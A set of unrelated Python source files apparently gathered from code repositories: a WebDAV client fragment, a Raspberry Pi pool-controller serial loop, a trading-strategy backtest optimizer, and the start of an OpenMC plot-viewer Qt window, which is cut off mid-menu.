e = sys.exc_info()[1]
logger.exception(e)
if block:
qWork.join()
def mkdir(self, href):
"""
create remote folder
:param href: remote path
:return: response
"""
for iTry in range(TRYINGS):
logger.info(u("mkdir(%s): %s") % (iTry, href))
try:
href = remote(href)
href = _encode_utf8(href)
href = quote(href)
con = self.getConnection()
con.request("MKCOL", href, "", self.getHeaders())
response = con.getresponse()
checkResponse(response)
return response.read()
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def download(self, href):
"""
        Download a file and return its content
        :param href: remote path
        :return: file content as bytes (empty bytes if the resource was not found)
"""
for iTry in range(TRYINGS):
try:
logger.info(u("download(%s): %s") % (iTry, href))
href = remote(href)
href = _encode_utf8(href)
href = quote(href)
conn = self.getConnection()
conn.request("GET", href, "", self.getHeaders())
response = conn.getresponse()
checkResponse(response, "href={0}".format(href))
data = response.read()
if data == b('resource not found'):
return b("")
else:
return data
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def downloadTo(self, href, localpath):
"""
        Download a file to local storage
        :param href: remote path
        :param localpath: local path
        :return: True on success, False if the resource was not found
"""
for iTry in range(TRYINGS):
logger.info(u("downloadTo(%s): %s %s") % (iTry, href, localpath))
try:
href = remote(href)
localpath = _(localpath)
href = _encode_utf8(href)
href = quote(href)
conn = self.getConnection()
conn.request("GET", href, "", self.getHeaders())
response = conn.getresponse()
checkResponse(response)
f = None
try:
while True:
data = response.read(1024)
if not data:
break
if data == u('resource not found'):
return False
if not f:
f = open(localpath, "wb")
f.write(data)
finally:
if f:
f.close()
return True
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def delete(self, href):
"""
Delete file from remote server
:param href: remote path
:return: response
"""
for iTry in range(TRYINGS):
logger.info(u("delete(%s): %s") % (iTry, href))
try:
href = remote(href)
href = _encode_utf8(href)
href = quote(href)
conn = self.getConnection()
conn.request("DELETE", href, "", self.getHeaders())
response = conn.getresponse()
checkResponse(response)
return response.read()
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def write(self, f, href, length=None):
logger.info(u("write: %s") % href)
href = remote(href)
href = os.path.join(u("/"), href)
try:
conn = self.getConnection()
headers = self.getHeaders()
headers.update({
"Content-Type": "application/binary",
"Expect": "100-continue"
})
if length:
headers["Content-Length"] = length
href = _encode_utf8(href)
href = quote(href)
conn.request("PUT", href, f, headers)
response = conn.getresponse()
checkResponse(response)
data = response.read()
return data
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def upload(self, localpath, href):
"""
Upload file from localpath to remote server
:param localpath: local path
:param href: remote path
:return: response
"""
localpath = _(localpath)
href = remote(href)
if not os.path.exists(localpath):
logger.info(u("ERROR: localfile: %s not found") % localpath)
return
if os.path.islink(localpath):
return self.upload(os.path.abspath(os.path.realpath(localpath)), href)
# 3 tryings to upload file
for iTry in range(TRYINGS):
try:
logger.info(u("upload: %s %s") % (localpath, href))
length = os.path.getsize(localpath)
if PY3:
_open = open(_encode_utf8(localpath), "rb")
else:
_open = open(_encode_utf8(localpath), "r")
with _open as f:
return self.write(f, href, length=length)
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
if __name__ == "__main__":
pass
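
# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A minimal example of driving Config; the credentials and paths below are placeholders.
# It is defined as a function that is never called, so importing the module has no side effects.
def _example_usage():
    conf = Config({
        "user": "user@example.com",      # hypothetical login
        "password": "app-password",      # hypothetical app password
        "host": "webdav.yandex.ru",
        "limit": 4,                       # worker threads used by sync()
    })
    conf.mkdir("/backup")                 # create a remote folder
    conf.upload("/tmp/report.txt", "/backup/report.txt")
    folders, files = conf.list("/backup") # dicts keyed by remote href
    conf.sync("/tmp/photos", "/backup/photos")  # mirror a local folder
    return folders, files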
|
pool-pi.py
|
from commands import *
from threading import Thread
from model import *
from web import *
from parsing import *
from os import makedirs
from os.path import exists
from os import stat
import logging
from logging.handlers import TimedRotatingFileHandler
#TODO start this on pi startup
def readSerialBus(serialHandler):
'''
Read data from the serial bus to build full frame in buffer.
Serial frames begin with DLE STX and terminate with DLE ETX.
With the exception of searching for the two start bytes, this function only reads one byte to prevent blocking other processes.
When looking for start of frame, looking_for_start is True.
    When the buffer is filled with a full frame and ready to be parsed, set buffer_full to True.
'''
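    # Frame layout (editor's note, inferred from the byte literals and slicing in parseBuffer()
    # below, where DLE=0x10, STX=0x02, ETX=0x03 and frame[2:4]/frame[4:-4] are used):
    #   DLE STX | frame type (2 bytes) | data ... | checksum (2 bytes, assumed) | DLE ETX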
if (serialHandler.in_waiting() == 0
): #Check if we have serial data to read
return
if (serialHandler.buffer_full == True
): #Check if we already have a full frame in buffer
return
serChar = serialHandler.read()
if serialHandler.looking_for_start:
# We are looking for DLE STX to find beginning of frame
if serChar == DLE:
serChar = serialHandler.read()
if serChar == STX:
# We have found start (DLE STX)
serialHandler.buffer.clear()
serialHandler.buffer += DLE
serialHandler.buffer += STX
serialHandler.looking_for_start = False
return
else:
# We have found DLE but not DLE STX
return
else:
# Non-DLE character
# We are only interested in DLE to find potential start
return
else:
# We have already found the start of the frame
# We are adding to buffer while looking for DLE ETX
serialHandler.buffer += serChar
# Check if we have found DLE ETX
if ((serChar == ETX)
and (serialHandler.buffer[-2] == int.from_bytes(DLE, 'big'))):
# We have found a full frame
serialHandler.buffer_full = True
serialHandler.looking_for_start = True
return
def parseBuffer(poolModel, serialHandler, commandHandler):
'''
If we have a full frame in buffer, parse it.
If frame is keep alive, check to see if we are ready to send a command and if so send it.
'''
if (serialHandler.buffer_full):
frame = serialHandler.buffer
# Remove any extra x00 after x10
frame = frame.replace(b'\x10\x00', b'\x10')
# Ensure no erroneous start/stop within frame
if b'\x10\x02' in frame[2:-2]:
logging.error(f'DLE STX in frame: {frame}')
serialHandler.reset()
return
if b'\x10\x03' in frame[2:-2]:
logging.error(f'DLE ETX in frame: {frame}')
serialHandler.reset()
return
# Compare calculated checksum to frame checksum
if (confirmChecksum(frame) == False):
# If checksum doesn't match, message is invalid.
# Clear buffer and don't attempt parsing.
serialHandler.reset()
return
frameType = frame[2:4]
data = frame[4:-4]
# Use frame type to determine parsing function
if frameType == FRAME_TYPE_KEEPALIVE:
# Check to see if we have a command to send
if serialHandler.ready_to_send == True:
if commandHandler.keep_alive_count == 1:
# If this is the second sequential keep alive frame, send command
serialHandler.send(commandHandler.full_command)
logging.info(
f'Sent: {commandHandler.parameter}, {commandHandler.full_command}'
)
if commandHandler.confirm == False:
commandHandler.sending_message = False
serialHandler.ready_to_send = False
else:
commandHandler.keep_alive_count = 1
else:
commandHandler.keep_alive_count = 0
else:
# Message is not keep alive
commandHandler.keep_alive_count = 0
if frameType == FRAME_TYPE_DISPLAY:
parseDisplay(data, poolModel)
commandHandler.keep_alive_count = 0
elif frameType == FRAME_TYPE_LEDS:
parseLEDs(data, poolModel)
else:
            logging.info(f'Unknown update: {frameType}, {data}')
# Clear buffer and reset flags
serialHandler.reset()
def checkCommand(poolModel, serialHandler, commandHandler):
'''
If we are trying to send a message, wait for a new pool model to get pool states
If necessary, queue message to be sent after second keep alive
Are we currently trying to send a command?
'''
if commandHandler.sending_message == False:
# We aren't trying to send a command
return
if serialHandler.ready_to_send == True:
# We are already ready to send, awaiting keep alive
return
if poolModel.last_update_time >= commandHandler.last_model_time:
# We have a new poolModel
if poolModel.getParameterState(
commandHandler.parameter) == commandHandler.target_state:
# Model matches
logging.info(f'Command success.')
commandHandler.sending_message = False
poolModel.sending_message = False
poolModel.flag_data_changed = True
else:
# New poolModel doesn't match
if commandHandler.checkSendAttempts() == True:
commandHandler.last_model_time = time.time()
serialHandler.ready_to_send = True
def getCommand(poolModel, serialHandler, commandHandler):
'''
If we're not currently sending a command, check if there are new commands.
Get new command from command_queue, validate, and initiate send with commandHandler.
'''
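    # Each line of command_queue.txt is CSV with four fields, matching the parsing below:
    #   commandID,desiredState,version,confirm
    # e.g. a hypothetical entry "FILTER,ON,2,1"; confirm == '1' means the command must be
    # verified against the model, anything else is treated as a fire-once menu button.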
#TODO figure out threading issue or move command_queue to tmp directory
if commandHandler.sending_message == True:
#We are currently trying to send a command, don't need to check for others
return
if exists('command_queue.txt') == False:
return
if stat('command_queue.txt').st_size != 0:
f = open('command_queue.txt', 'r+')
line = f.readline()
# TODO check if this if statement is necessary or if it's redundant with st_size check
try:
if len(line.split(',')) == 4:
# Extract csv command info
commandID = line.split(',')[0]
commandDesiredState = line.split(',')[1]
commandVersion = int(line.split(',')[2])
commandConfirm = line.split(',')[3]
if commandConfirm == '1':
# Command is not a menu button.
# Confirmation if command was successful is needed
# Check against model to see if command state and version are valid
# If valid, add to send queue
# If not, provide feedback to user
if poolModel.getParameterState(commandID) == 'INIT':
logging.error(
f'Invalid command: Target parameter {commandID} is in INIT state.'
)
f.close()
return
else:
if commandVersion == poolModel.getParameterVersion(
commandID):
#Front end and back end versions are synced
#Extra check to ensure we are not already in our desired state
if commandDesiredState == poolModel.getParameterState(
commandID):
logging.error(
f'Invalid command: Target parameter {commandID} is already in target state {commandDesiredState}.'
)
else:
# Command is valid
logging.info(
f'Valid command: {commandID} {commandDesiredState}, version {commandVersion}'
)
#Push to command handler
commandHandler.initiateSend(
commandID, commandDesiredState,
commandConfirm)
poolModel.sending_message = True
else:
logging.error(
f'Invalid command: Target parameter {commandID} version is {poolModel.getParameterVersion(commandID)} but command version is {commandVersion}.'
)
else:
# Command is a menu button
# No confirmation needed. Only send once.
# No check against model states/versions needed.
# Immediately load for sending.
commandHandler.initiateSend(commandID, commandDesiredState,
commandConfirm)
serialHandler.ready_to_send = True
else:
logging.error(
f'Invalid command: Command structure is invalid: {line}')
except Exception as e:
logging.error(
f'Invalid command: Error parsing command: {line}, {e}')
# Clear file contents
f.truncate(0)
f.close()
return
def sendModel(poolModel):
    # If we have new data for the front end, send it as JSON
if poolModel.flag_data_changed == True:
socketio.emit('model', poolModel.toJSON())
logging.debug('Sent model')
poolModel.flag_data_changed = False
return
def main():
poolModel = PoolModel()
serialHandler = SerialHandler()
commandHandler = CommandHandler()
if exists('command_queue.txt') == True:
if stat('command_queue.txt').st_size != 0:
f = open('command_queue.txt', 'r+')
f.truncate(0)
f.close()
while (True):
# Read Serial Bus
# If new serial data is available, read from the buffer
readSerialBus(serialHandler)
# Parse Buffer
# If a full serial frame has been found, decode it and update model.
# If we have a command ready to be sent, send.
parseBuffer(poolModel, serialHandler, commandHandler)
# If we are sending a command, check if command needs to be sent.
# Check model for updates to see if command was accepted.
checkCommand(poolModel, serialHandler, commandHandler)
# Send updates to front end.
sendModel(poolModel)
# If we're not sending, check for new commands from front end.
getCommand(poolModel, serialHandler, commandHandler)
if __name__ == '__main__':
# Create log file directory if not already existing
if not exists('logs'):
makedirs('logs')
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
handler = TimedRotatingFileHandler('logs/pool-pi.log',
when='midnight',
interval=5)
handler.suffix = '%Y-%m-%d_%H-%M-%S'
handler.setFormatter(formatter)
logging.getLogger().handlers.clear()
logging.getLogger().addHandler(handler)
logging.getLogger().setLevel(logging.INFO)
logging.info('Started pool-pi.py')
Thread(
target=lambda: socketio.run(app, debug=False, host='0.0.0.0')).start()
Thread(target=main).start()
|
WtCtaOptimizer.py
|
import multiprocessing
import time
import threading
import json
import os
import math
import numpy as np
import pandas as pd
from pandas import DataFrame as df
from wtpy import WtBtEngine,EngineType
def fmtNAN(val, defVal = 0):
if math.isnan(val):
return defVal
return val
class ParamInfo:
'''
    Parameter info class
'''
def __init__(self, name:str, start_val = None, end_val = None, step_val = None, ndigits = 1, val_list:list = None):
        self.name = name            # parameter name
        self.start_val = start_val  # start value
        self.end_val = end_val      # end value
        self.step_val = step_val    # step size
        self.ndigits = ndigits      # number of decimal places
        self.val_list = val_list    # explicit list of values
def gen_array(self):
if self.val_list is not None:
return self.val_list
values = list()
curVal = round(self.start_val, self.ndigits)
while curVal < self.end_val:
values.append(curVal)
curVal += self.step_val
curVal = round(curVal, self.ndigits)
if curVal >= self.end_val:
curVal = self.end_val
break
values.append(round(curVal, self.ndigits))
return values
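# Worked example (editor's note): ParamInfo("k", start_val=10, end_val=14, step_val=2).gen_array()
# walks 10 -> 12 -> 14 and returns [10, 12, 14]; when start_val < end_val the end value is always
# appended as the last element, even if it is off the step grid (end_val=15 with the same
# start/step would give [10, 12, 14, 15]).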
class WtCtaOptimizer:
'''
    Parameter optimizer\n
    Mainly used for optimizing strategy parameters
'''
def __init__(self, worker_num:int = 8):
'''
        Constructor\n
        @worker_num number of worker processes, 8 by default; set it according to the number of CPU cores
'''
self.worker_num = worker_num
self.running_worker = 0
self.mutable_params = dict()
self.fixed_params = dict()
self.env_params = dict()
return
def add_mutable_param(self, name:str, start_val, end_val, step_val, ndigits = 1):
'''
        Add a mutable (optimizable) parameter\n
        @name parameter name\n
        @start_val start value\n
        @end_val end value\n
        @step_val step size\n
        @ndigits number of decimal places
'''
self.mutable_params[name] = ParamInfo(name=name, start_val=start_val, end_val=end_val, step_val=step_val, ndigits=ndigits)
def add_listed_param(self, name:str, val_list:list):
'''
        Add a mutable parameter restricted to an explicit list of values\n
        @name parameter name\n
        @val_list list of candidate values
'''
self.mutable_params[name] = ParamInfo(name=name, val_list=val_list)
def add_fixed_param(self, name:str, val):
'''
        Add a fixed parameter\n
        @name parameter name\n
        @val value\n
'''
self.fixed_params[name] = val
return
def set_strategy(self, typeName:type, name_prefix:str):
'''
        Set the strategy\n
        @typeName strategy class\n
        @name_prefix naming prefix used for auto-generated names, typically "prefix_param1name_param1value_param2name_param2value_..."
'''
self.strategy_type = typeName
self.name_prefix = name_prefix
return
def config_backtest_env(self, deps_dir:str, cfgfile:str="configbt.json", storage_type:str="csv", storage_path:str = None, db_config:dict = None):
'''
        Configure the backtest environment\n
        @deps_dir directory containing the dependency files\n
        @cfgfile configuration file name\n
        @storage_type storage type, e.g. csv/bin\n
        @storage_path storage path\n
        @db_config database configuration dict (required when storage_type is "db")
'''
self.env_params["deps_dir"] = deps_dir
self.env_params["cfgfile"] = cfgfile
self.env_params["storage_type"] = storage_type
if storage_path is None and db_config is None:
            raise Exception("storage_path and db_config cannot both be None!")
if storage_type == 'db' and db_config is None:
raise Exception("db_config cannot be None while storage_type is db!")
self.env_params["storage_path"] = storage_path
self.env_params["db_config"] = db_config
def config_backtest_time(self, start_time:int, end_time:int):
'''
        Configure the backtest time range\n
        @start_time start time with minute precision, e.g. 201909100930\n
        @end_time end time with minute precision, e.g. 201909100930
'''
self.env_params["start_time"] = start_time
self.env_params["end_time"] = end_time
def __gen_tasks__(self, markerfile:str = "strategies.json"):
'''
        Generate the backtest tasks, one per parameter combination
'''
param_names = self.mutable_params.keys()
param_values = dict()
        # First build the array of values for each parameter
        # and compute the total number of parameter groups
total_groups = 1
for name in param_names:
paramInfo = self.mutable_params[name]
values = paramInfo.gen_array()
param_values[name] = values
total_groups *= len(values)
        # Then build the final parameter dict for each group
param_groups = list()
stra_names = dict()
for i in range(total_groups):
k = i
            thisGrp = self.fixed_params.copy()  # copy the fixed parameters
endix = ''
for name in param_names:
cnt = len(param_values[name])
curVal = param_values[name][k%cnt]
thisGrp[name] = curVal
endix += name
endix += "_"
endix += str(curVal)
endix += "_"
k = math.floor(k / cnt)
endix = endix[:-1]
straName = self.name_prefix + endix
thisGrp["name"] = straName
stra_names[straName] = thisGrp
param_groups.append(thisGrp)
        # Persist every parameter group and its strategy ID to a file for later analysis
f = open(markerfile, "w")
f.write(json.dumps(obj=stra_names, sort_keys=True, indent=4))
f.close()
return param_groups
def __ayalyze_result__(self, strName:str, params:dict):
folder = "./outputs_bt/%s/" % (strName)
df_closes = pd.read_csv(folder + "closes.csv")
df_funds = pd.read_csv(folder + "funds.csv")
df_wins = df_closes[df_closes["profit"]>0]
df_loses = df_closes[df_closes["profit"]<=0]
ay_WinnerBarCnts = df_wins["closebarno"]-df_wins["openbarno"]
ay_LoserBarCnts = df_loses["closebarno"]-df_loses["openbarno"]
total_winbarcnts = ay_WinnerBarCnts.sum()
total_losebarcnts = ay_LoserBarCnts.sum()
total_fee = df_funds.iloc[-1]["fee"]
        totaltimes = len(df_closes)   # total number of trades
        wintimes = len(df_wins)       # number of winning trades
        losetimes = len(df_loses)     # number of losing trades
        winamout = df_wins["profit"].sum()      # gross profit
        loseamount = df_loses["profit"].sum()   # gross loss
        trdnetprofit = winamout + loseamount    # net trading profit/loss
        accnetprofit = trdnetprofit - total_fee # net account profit/loss
        winrate = wintimes / totaltimes if totaltimes>0 else 0    # win rate
        avgprof = trdnetprofit/totaltimes if totaltimes>0 else 0  # average profit/loss per trade
        avgprof_win = winamout/wintimes if wintimes>0 else 0      # average profit per winning trade
        avgprof_lose = loseamount/losetimes if losetimes>0 else 0 # average loss per losing trade
        winloseratio = abs(avgprof_win/avgprof_lose) if avgprof_lose!=0 else "N/A" # ratio of average win to average loss
        max_consecutive_wins = 0  # maximum number of consecutive winning trades
        max_consecutive_loses = 0 # maximum number of consecutive losing trades
avg_bars_in_winner = total_winbarcnts/wintimes if wintimes>0 else "N/A"
avg_bars_in_loser = total_losebarcnts/losetimes if losetimes>0 else "N/A"
consecutive_wins = 0
consecutive_loses = 0
for idx, row in df_closes.iterrows():
profit = row["profit"]
if profit > 0:
consecutive_wins += 1
consecutive_loses = 0
else:
consecutive_wins = 0
consecutive_loses += 1
max_consecutive_wins = max(max_consecutive_wins, consecutive_wins)
max_consecutive_loses = max(max_consecutive_loses, consecutive_loses)
summary = params.copy()
summary["Total Trades"] = totaltimes
summary["Winning Trades"] = wintimes
summary["Losing Trades"] = losetimes
summary["Gross Profit"] = float(winamout)
summary["Gross Loss"] = float(loseamount)
summary["Net Profit"] = float(trdnetprofit)
summary["% Profitable"] = winrate*100
summary["Avg Trade"] = avgprof
summary["Avg Winning Trade"] = avgprof_win
summary["Avg Losing Trade"] = avgprof_lose
summary["Win/Loss Ratio"] = winloseratio
summary["Max Consecutive Winners"] = max_consecutive_wins
summary["Max Consecutive Losers"] = max_consecutive_loses
summary["Avg Bars in Winner"] = avg_bars_in_winner
summary["Avg Bars in Loser"] = avg_bars_in_loser
summary["Return on Account"] = accnetprofit/totaltimes
f = open(folder+"summary.json", "w")
f.write(json.dumps(obj=summary, indent=4))
f.close()
return
def __execute_task__(self, params:dict):
'''
        Execute a single backtest task\n
        @params parameters as a key-value dict
'''
name = params["name"]
f = open("logcfg_tpl.json", "r")
content =f.read()
f.close()
content = content.replace("$NAME$", name)
engine = WtBtEngine(eType=EngineType.ET_CTA, logCfg=content, isFile=False)
engine.init(self.env_params["deps_dir"], self.env_params["cfgfile"])
engine.configBacktest(self.env_params["start_time"],self.env_params["end_time"])
engine.configBTStorage(mode=self.env_params["storage_type"], path=self.env_params["storage_path"], dbcfg=self.env_params["db_config"])
engine.commitBTConfig()
straInfo = self.strategy_type(**params)
engine.set_cta_strategy(straInfo)
engine.run_backtest()
engine.release_backtest()
self.__ayalyze_result__(name, params)
def __start_task__(self, params:dict):
'''
        Start a single backtest task\n
        A thread is used to launch the child process so that the total number of worker processes can be capped\n
        The thread joins the child process and only then decrements the running_worker counter\n
        running_worker cannot be updated inside __execute_task__ because that code runs in a different process, where the data is not shared\n
        @params parameters as a key-value dict
'''
p = multiprocessing.Process(target=self.__execute_task__, args=(params,))
p.start()
p.join()
self.running_worker -= 1
        print("Running workers: %d" % (self.running_worker))
def go(self, interval:float = 0.2, out_marker_file:str = "strategies.json", out_summary_file:str = "total_summary.csv"):
'''
        Start the optimizer\n
        @interval polling interval in seconds\n
        @out_marker_file marker file recording each strategy's parameters, used by the later analysis\n
        @out_summary_file CSV file that aggregates the per-strategy backtest summaries
'''
self.tasks = self.__gen_tasks__(out_marker_file)
self.running_worker = 0
total_task = len(self.tasks)
left_task = total_task
while True:
if left_task == 0:
break
if self.running_worker < self.worker_num:
params = self.tasks[total_task-left_task]
left_task -= 1
                print("Remaining tasks: %d" % (left_task))
p = threading.Thread(target=self.__start_task__, args=(params,))
p.start()
self.running_worker += 1
                print("Running workers: %d" % (self.running_worker))
else:
time.sleep(interval)
        # Finally, all tasks have been launched; wait for the remaining worker processes to finish
while True:
if self.running_worker == 0:
break
else:
time.sleep(interval)
        # Aggregate the backtest results
f = open(out_marker_file, "r")
content = f.read()
f.close()
obj_stras = json.loads(content)
total_summary = list()
for straName in obj_stras:
filename = "./outputs_bt/%s/summary.json" % (straName)
if not os.path.exists(filename):
                print("%s does not exist, please check the data" % (filename))
continue
f = open(filename, "r")
content = f.read()
f.close()
obj_summary = json.loads(content)
total_summary.append(obj_summary)
df_summary = df(total_summary)
df_summary = df_summary.drop(labels=["name"], axis='columns')
df_summary.to_csv(out_summary_file)
def analyze(self, out_marker_file:str = "strategies.json", out_summary_file:str = "total_summary.csv"):
        # Aggregate the backtest results
f = open(out_marker_file, "r")
content = f.read()
f.close()
total_summary = list()
obj_stras = json.loads(content)
for straName in obj_stras:
params = obj_stras[straName]
filename = "./outputs_bt/%s/summary.json" % (straName)
if not os.path.exists(filename):
                print("%s does not exist, please check the data" % (filename))
continue
self.__ayalyze_result__(straName, params)
f = open(filename, "r")
content = f.read()
f.close()
obj_summary = json.loads(content)
total_summary.append(obj_summary)
df_summary = df(total_summary)
df_summary = df_summary.drop(labels=["name"], axis='columns')
df_summary.to_csv(out_summary_file)
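
# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A minimal driver for the optimizer above. `MyStrategy` and the instrument code are
# hypothetical placeholders; every call below uses only methods defined in WtCtaOptimizer.
# The function is never invoked, so importing the module has no side effects.
def _example_optimize():
    from strategies import MyStrategy   # hypothetical CTA strategy class
    optimizer = WtCtaOptimizer(worker_num=4)
    optimizer.add_mutable_param(name="k1", start_val=0.1, end_val=0.5, step_val=0.1, ndigits=1)
    optimizer.add_listed_param(name="period", val_list=[10, 20, 30])
    optimizer.add_fixed_param(name="code", val="CFFEX.IF.HOT")   # hypothetical contract code
    optimizer.set_strategy(MyStrategy, name_prefix="IF_")
    optimizer.config_backtest_env(deps_dir="./common/", cfgfile="configbt.json",
                                  storage_type="csv", storage_path="./storage/")
    optimizer.config_backtest_time(start_time=201909010930, end_time=201912011500)
    optimizer.go(interval=0.2)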
|
main_window.py
|
import copy
from functools import partial
import os
import pickle
from threading import Thread
from PySide2 import QtCore, QtGui
from PySide2.QtGui import QKeyEvent
from PySide2.QtWidgets import (QApplication, QLabel, QSizePolicy, QMainWindow,
QScrollArea, QMessageBox, QAction, QFileDialog,
QColorDialog, QInputDialog, QWidget,
QGestureEvent)
import openmc
import openmc.lib
try:
import vtk
_HAVE_VTK = True
except ImportError:
_HAVE_VTK = False
from .plotmodel import PlotModel, DomainTableModel
from .plotgui import PlotImage, ColorDialog
from .docks import DomainDock, TallyDock
from .overlays import ShortcutsOverlay
from .tools import ExportDataDialog
_COORD_LEVELS = 0
def _openmcReload():
# reset OpenMC memory, instances
openmc.lib.reset()
openmc.lib.finalize()
# initialize geometry (for volume calculation)
openmc.lib.settings.output_summary = False
openmc.lib.init(["-c"])
class MainWindow(QMainWindow):
def __init__(self, font=QtGui.QFontMetrics(QtGui.QFont()), screen_size=QtCore.QSize()):
super().__init__()
self.screen = screen_size
self.font_metric = font
self.setWindowTitle('OpenMC Plot Explorer')
def loadGui(self):
self.pixmap = None
self.zoom = 100
self.loadModel()
# Create viewing area
self.frame = QScrollArea(self)
cw = QWidget()
self.frame.setCornerWidget(cw)
self.frame.setAlignment(QtCore.Qt.AlignCenter)
self.frame.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(self.frame)
# connect pinch gesture (OSX)
self.grabGesture(QtCore.Qt.PinchGesture)
# Create plot image
self.plotIm = PlotImage(self.model, self.frame, self)
self.frame.setWidget(self.plotIm)
# Dock
self.dock = DomainDock(self.model, self.font_metric, self)
self.dock.setObjectName("Domain Options Dock")
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.dock)
# Tally Dock
self.tallyDock = TallyDock(self.model, self.font_metric, self)
self.tallyDock.update()
self.tallyDock.setObjectName("Tally Options Dock")
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.tallyDock)
        # Color Dialog
self.colorDialog = ColorDialog(self.model, self.font_metric, self)
self.colorDialog.hide()
# Tools
self.exportDataDialog = ExportDataDialog(self.model, self.font_metric, self)
# Restore Window Settings
self.restoreWindowSettings()
# Create menubar
self.createMenuBar()
self.updateEditMenu()
# Status Bar
self.coord_label = QLabel()
self.statusBar().addPermanentWidget(self.coord_label)
self.coord_label.hide()
# Keyboard overlay
self.shortcutOverlay = ShortcutsOverlay(self)
self.shortcutOverlay.hide()
# Load Plot
self.statusBar().showMessage('Generating Plot...')
self.dock.updateDock()
self.tallyDock.update()
self.colorDialog.updateDialogValues()
self.statusBar().showMessage('')
# Timer allows GUI to render before plot finishes loading
QtCore.QTimer.singleShot(0, self.plotIm.generatePixmap)
QtCore.QTimer.singleShot(0, self.showCurrentView)
def event(self, event):
# use pinch event to update zoom
if isinstance(event, QGestureEvent):
pinch = event.gesture(QtCore.Qt.PinchGesture)
self.editZoom(self.zoom * pinch.scaleFactor())
if isinstance(event, QKeyEvent) and hasattr(self, "shortcutOverlay"):
self.shortcutOverlay.event(event)
return super().event(event)
def show(self):
super().show()
self.plotIm._resize()
def toggleShortcuts(self):
if self.shortcutOverlay.isVisible():
self.shortcutOverlay.close()
else:
self.shortcutOverlay.move(0, 0)
self.shortcutOverlay.resize(self.width(), self.height())
self.shortcutOverlay.show()
# Create and update menus:
def createMenuBar(self):
self.mainMenu = self.menuBar()
# File Menu
self.reloadModelAction = QAction("&Reload model...", self)
self.reloadModelAction.setShortcut("Ctrl+Shift+R")
self.reloadModelAction.setToolTip("Reload current model")
self.reloadModelAction.setStatusTip("Reload current model")
reload_connector = partial(self.loadModel, reload=True)
self.reloadModelAction.triggered.connect(reload_connector)
self.saveImageAction = QAction("&Save Image As...", self)
self.saveImageAction.setShortcut("Ctrl+Shift+S")
self.saveImageAction.setToolTip('Save plot image')
self.saveImageAction.setStatusTip('Save plot image')
self.saveImageAction.triggered.connect(self.saveImage)
self.saveViewAction = QAction("Save &View...", self)
self.saveViewAction.setShortcut(QtGui.QKeySequence.Save)
self.saveViewAction.setStatusTip('Save current view settings')
self.saveViewAction.triggered.connect(self.saveView)
self.openAction = QAction("&Open View...", self)
self.openAction.setShortcut(QtGui.QKeySequence.Open)
self.openAction.setToolTip('Open saved view settings')
self.openAction.setStatusTip('Open saved view settings')
self.openAction.triggered.connect(self.openView)
self.quitAction = QAction("&Quit", self)
self.quitAction.setShortcut(QtGui.QKeySequence.Quit)
self.quitAction.setToolTip('Quit OpenMC Plot Explorer')
self.quitAction.setStatusTip('Quit OpenMC Plot Explorer')
self.quitAction.triggered.connect(self.close)
self.exportDataAction = QAction('E&xport...', self)
        self.exportDataAction.setToolTip('Export model and tally data to VTK')
        self.exportDataAction.setStatusTip('Export current model and tally data to VTK')
self.exportDataAction.triggered.connect(self.exportTallyData)
if not _HAVE_VTK:
self.exportDataAction.setEnabled(False)
self.exportDataAction.setToolTip("Disabled: VTK Python module is not installed")
self.fileMenu = self.mainMenu.addMenu('&File')
self.fileMenu.addAction(self.reloadModelAction)
self.fileMenu.addAction(self.saveImageAction)
self.fileMenu.addAction(self.exportDataAction)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.saveViewAction)
self.fileMenu.addAction(self.openAction)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.quitAction)
# Data Menu
self.openStatePointAction = QAction("&Open statepoint...", self)
self.openStatePointAction.setToolTip('Open statepoint file')
self.openStatePointAction.triggered.connect(self.openStatePoint)
self.dataMenu = self.mainMenu.addMenu('D&ata')
self.dataMenu.addAction(self.openStatePointAction)
self.updateDataMenu()
# Edit Menu
self.applyAction = QAction("&Apply Changes", self)
self.applyAction.setShortcut("Ctrl+Return")
self.applyAction.setToolTip('Generate new view with changes applied')
self.applyAction.setStatusTip('Generate new view with changes applied')
self.applyAction.triggered.connect(self.applyChanges)
self.undoAction = QAction('&Undo', self)
self.undoAction.setShortcut(QtGui.QKeySequence.Undo)
self.undoAction.setToolTip('Undo')
self.undoAction.setStatusTip('Undo last plot view change')
self.undoAction.setDisabled(True)
self.undoAction.triggered.connect(self.undo)
self.redoAction = QAction('&Redo', self)
self.redoAction.setDisabled(True)
self.redoAction.setToolTip('Redo')
self.redoAction.setStatusTip('Redo last plot view change')
self.redoAction.setShortcut(QtGui.QKeySequence.Redo)
self.redoAction.triggered.connect(self.redo)
self.restoreAction = QAction("&Restore Default Plot", self)
self.restoreAction.setShortcut("Ctrl+R")
self.restoreAction.setToolTip('Restore to default plot view')
self.restoreAction.setStatusTip('Restore to default plot view')
self.restoreAction.triggered.connect(self.restoreDefault)
self.editMenu = self.mainMenu.addMenu('&Edit')
self.editMenu.addAction(self.applyAction)
self.editMenu.addSeparator()
self.editMenu.addAction(self.undoAction)
self.editMenu.addAction(self.redoAction)
self.editMenu.addSeparator()
self.editMenu.addAction(self.restoreAction)
self.editMenu.addSeparator()
self.editMenu.aboutToShow.connect(self.updateEditMenu)
# Edit -> Basis Menu
self.xyAction = QAction('&xy ', self)
self.xyAction.setCheckable(True)
self.xyAction.setShortcut('Alt+X')
self.xyAction.setToolTip('Change to xy basis')
self.xyAction.setStatusTip('Change to xy basis')
xy_connector = partial(self.editBasis, 'xy', apply=True)
self.xyAction.triggered.connect(xy_connector)
self.xzAction = QAction('x&z ', self)
self.xzAction.setCheckable(True)
self.xzAction.setShortcut('Alt+Z')
self.xzAction.setToolTip('Change to xz basis')
